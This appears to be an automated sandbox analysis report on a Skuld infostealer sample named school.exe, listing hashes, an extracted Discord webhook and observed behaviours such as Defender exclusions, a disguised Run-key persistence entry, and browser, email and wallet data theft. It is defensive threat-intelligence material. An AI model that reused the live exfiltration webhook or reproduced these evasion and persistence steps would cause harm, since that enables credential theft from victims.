Analysis
-
max time kernel
232s -
max time network
204s -
platform
windows11-21h2_x64 -
resource
win11-20240704-en -
resource tags
arch:x64arch:x86image:win11-20240704-enlocale:en-usos:windows11-21h2-x64system -
submitted
09-07-2024 04:21
Behavioral task
behavioral1
Sample
school.exe
Resource
win11-20240704-en
General
-
Target
school.exe
-
Size
9.3MB
-
MD5
df99beb55f643551ae73184125d723ec
-
SHA1
9ea0ac60ec61a64dcb9eb21509b76ee8799434d5
-
SHA256
e8692661ffd0327708f581369c56af975a541c6565b97af794c8b7adfa297c15
-
SHA512
b5cf419550d3331cbc1ff32a78b9bcc4f5694bbf2de351bb4d6d6812d705726d5651306ce8a9ac7fec82ad3c3922228dc5c09e49daf5b65528b2e09a02227f98
-
SSDEEP
98304:sS+tg/BozXxWs0XHvLHMx3TN0E1eCFayKyY90xfm:7/BozXezHMx3Tv1eCFayNxm
Malware Config
Extracted
skuld
https://discord.com/api/webhooks/1260084983779823679/oksd2KHzMyoQZqqI4MwVE2vLGUihg1S0E0LXatDcQ1i1lpnsAwy_F34SoeRwH1q5WmA8
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1916 powershell.exe 4932 powershell.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts school.exe -
Executes dropped EXE 2 IoCs
pid Process 792 school.exe 1432 school.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3119450053-3073099215-1938054741-1000\Software\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe" school.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 1 discord.com 6 discord.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 api.ipify.org 1 ip-api.com 2 api.ipify.org -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 school.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum school.exe -
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Detects videocard installed 1 TTPs 2 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1736 wmic.exe 1136 wmic.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 3 Go-http-client/1.1 -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133649726337927117" chrome.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3119450053-3073099215-1938054741-1000_Classes\Local Settings\MuiCache MiniSearchHost.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097a000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 school.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 5c000000010000000400000000080000190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017a000000010000000c000000300a06082b060105050703097f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c990b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 school.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 school.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 school.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 school.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f53000000010000007f000000307d3020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c009000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b060105050703080b0000000100000030000000440069006700690043006500720074002000420061006c00740069006d006f0072006500200052006f006f007400000062000000010000002000000016af57a9f676b0ab126095aa5ebadef22ab31119d644ac95cd4b93dbf3f26aeb140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c7f000000010000000c000000300a06082b060105050703097e000000010000000800000000c001b39667d601030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 school.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae4747e000000010000000800000000c001b39667d6017f000000010000000c000000300a06082b060105050703091d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df062000000010000002000000016af57a9f676b0ab126095aa5ebadef22ab31119d644ac95cd4b93dbf3f26aeb0b0000000100000030000000440069006700690043006500720074002000420061006c00740069006d006f0072006500200052006f006f007400000009000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b0601050507030853000000010000007f000000307d3020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 school.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C school.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 school.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 1916 powershell.exe 1916 powershell.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 2824 powershell.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 2824 powershell.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe 4780 school.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
pid Process 5040 chrome.exe 5040 chrome.exe 5040 chrome.exe 5040 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4780 school.exe Token: SeIncreaseQuotaPrivilege 472 wmic.exe Token: SeSecurityPrivilege 472 wmic.exe Token: SeTakeOwnershipPrivilege 472 wmic.exe Token: SeLoadDriverPrivilege 472 wmic.exe Token: SeSystemProfilePrivilege 472 wmic.exe Token: SeSystemtimePrivilege 472 wmic.exe Token: SeProfSingleProcessPrivilege 472 wmic.exe Token: SeIncBasePriorityPrivilege 472 wmic.exe Token: SeCreatePagefilePrivilege 472 wmic.exe Token: SeBackupPrivilege 472 wmic.exe Token: SeRestorePrivilege 472 wmic.exe Token: SeShutdownPrivilege 472 wmic.exe Token: SeDebugPrivilege 472 wmic.exe Token: SeSystemEnvironmentPrivilege 472 wmic.exe Token: SeRemoteShutdownPrivilege 472 wmic.exe Token: SeUndockPrivilege 472 wmic.exe Token: SeManageVolumePrivilege 472 wmic.exe Token: 33 472 wmic.exe Token: 34 472 wmic.exe Token: 35 472 wmic.exe Token: 36 472 wmic.exe Token: SeIncreaseQuotaPrivilege 472 wmic.exe Token: SeSecurityPrivilege 472 wmic.exe Token: SeTakeOwnershipPrivilege 472 wmic.exe Token: SeLoadDriverPrivilege 472 wmic.exe Token: SeSystemProfilePrivilege 472 wmic.exe Token: SeSystemtimePrivilege 472 wmic.exe Token: SeProfSingleProcessPrivilege 472 wmic.exe Token: SeIncBasePriorityPrivilege 472 wmic.exe Token: SeCreatePagefilePrivilege 472 wmic.exe Token: SeBackupPrivilege 472 wmic.exe Token: SeRestorePrivilege 472 wmic.exe Token: SeShutdownPrivilege 472 wmic.exe Token: SeDebugPrivilege 472 wmic.exe Token: SeSystemEnvironmentPrivilege 472 wmic.exe Token: SeRemoteShutdownPrivilege 472 wmic.exe Token: SeUndockPrivilege 472 wmic.exe Token: SeManageVolumePrivilege 472 wmic.exe Token: 33 472 wmic.exe Token: 34 472 wmic.exe Token: 35 472 wmic.exe Token: 36 472 wmic.exe Token: SeIncreaseQuotaPrivilege 1736 wmic.exe Token: SeSecurityPrivilege 1736 wmic.exe Token: SeTakeOwnershipPrivilege 1736 wmic.exe Token: SeLoadDriverPrivilege 1736 wmic.exe Token: SeSystemProfilePrivilege 1736 wmic.exe Token: SeSystemtimePrivilege 1736 wmic.exe Token: SeProfSingleProcessPrivilege 1736 wmic.exe Token: SeIncBasePriorityPrivilege 1736 wmic.exe Token: SeCreatePagefilePrivilege 1736 wmic.exe Token: SeBackupPrivilege 1736 wmic.exe Token: SeRestorePrivilege 1736 wmic.exe Token: SeShutdownPrivilege 1736 wmic.exe Token: SeDebugPrivilege 1736 wmic.exe Token: SeSystemEnvironmentPrivilege 1736 wmic.exe Token: SeRemoteShutdownPrivilege 1736 wmic.exe Token: SeUndockPrivilege 1736 wmic.exe Token: SeManageVolumePrivilege 1736 wmic.exe Token: 33 1736 wmic.exe Token: 34 1736 wmic.exe Token: 35 1736 wmic.exe Token: 36 1736 wmic.exe -
Suspicious use of FindShellTrayWindow 27 IoCs
